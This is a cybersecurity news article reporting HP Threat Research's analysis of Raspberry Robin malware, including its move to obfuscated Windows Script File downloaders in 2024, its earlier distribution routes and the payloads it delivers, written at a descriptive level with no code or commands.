HP details evolution of Raspberry Robin malware, shift in distribution method and threat landscape

Researchers from the HP Threat Research team have observed a shift in the distribution method of Raspberry Robin in March. The malware is now being disseminated through Windows Script Files (WSF). Initially discovered in late 2021, Raspberry Robin was identified as a Windows worm primarily targeting technology and manufacturing sectors. Over time, it has evolved into a significant threat to enterprises. 

Historically, Raspberry Robin was known to spread through removable media like USB drives, but its distributors have also experimented with other initial infection file types.

“Raspberry Robin is known for its heavy obfuscation and anti-analysis techniques to bypass detection, fool sandboxes, and slow down security teams seeking to understand the malware,” Patrick Schläpfer, malware analyst at HP, wrote in an HP Threat Research blog post. “Following infection, the malware communicates with its command and control (C2) servers over Tor. Raspberry Robin is capable of downloading and executing additional payloads, acting as a foothold for threat actors to deliver other malicious files.” 

Schläpfer detailed that the malware has been used to deliver families including SocGholish, Cobalt Strike, IcedID, BumbleBee, and Truebot, as well as being a precursor of ransomware.

Since 2021, hackers spreading Raspberry Robin have used different methods to infect endpoints including USB devices containing malicious Windows Shortcut Files ([dot]lnk). The shortcut files run Windows Installer commands using msiexec[dot]exe that download the payload from compromised QNAP network-attached storage devices. They have used archive files (RAR) hosted on Discord. Each RAR file contains an EXE and a DLL file. The EXE is a legitimate signed binary and uses DLL side-loading to load and run the malicious payload DLL.

Hackers have also used 7-Zip ([dot]7z) archive files downloaded using the victim’s web browser. Each archive contains a malicious Windows Installer ([dot]msi) package that infects the PC with Raspberry Robin. They have also adopted malicious adverts that when clicked on, download malicious ZIP files hosted on Discord that lead to Raspberry Robin.

Schläpfer identified that at the beginning of this year, cybercriminals spread the malware through archive files via web downloads. “In campaigns since early March 2024, however, its distributors swapped archive files with Windows Script Files (.wsf). These files are widely used by administrators and legitimate software to automate tasks within Windows but can also be abused by attackers. The WSF file format supports scripting languages, such as JScript and VBScript, that are interpreted by the Windows Script Host component built into the Windows operating system,” he added.

The Windows Script Files are offered for download via various malicious domains and subdomains controlled by the attackers. It’s not clear how threat actors are luring users to the malicious URLs. However, this could be via spam or malvertising campaigns.

“The script file acts as a downloader. Like the Raspberry Robin DLL, the script uses a variety of anti-analysis and virtual machine (VM) detection techniques. The final payload is only downloaded and executed when all these evaluation steps indicate that the malware is running on a real end-user device, rather than in a sandbox,” according to Schläpfer. “The scripts are highly obfuscated. At the time of analysis, they were not classified as malicious by any anti-virus scanners on VirusTotal, demonstrating the evasiveness of the malware.”

In conclusion, Schläpfer said that the recent activity represents the latest in a series of shifts in the way Raspberry Robin is distributed. Although best known for spreading through USB drives, threat actors deploying Raspberry Robin have been using different infection vectors such as web downloads to achieve their objectives. 

Additionally, the HP research said that WSF downloader is heavily obfuscated and uses a large range of anti-analysis and anti-VM techniques, enabling the malware to evade detection and slow down analysis. “This is particularly concerning given that Raspberry Robin has been used as a precursor for human-operated ransomware. Countering this malware early on in its infection chain should be a high priority for security teams,” the post added.

In December 2022, Trend Micro detected samples of the Raspberry Robin malware spreading across most of the group’s victims, largely from government agencies and telecommunication entities across Latin America, Oceania (Australia), and Europe, beginning in September. The main payload itself is packed with more than ten layers for obfuscation and is capable of delivering a fake payload once it detects sandboxing and security analytics tools.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.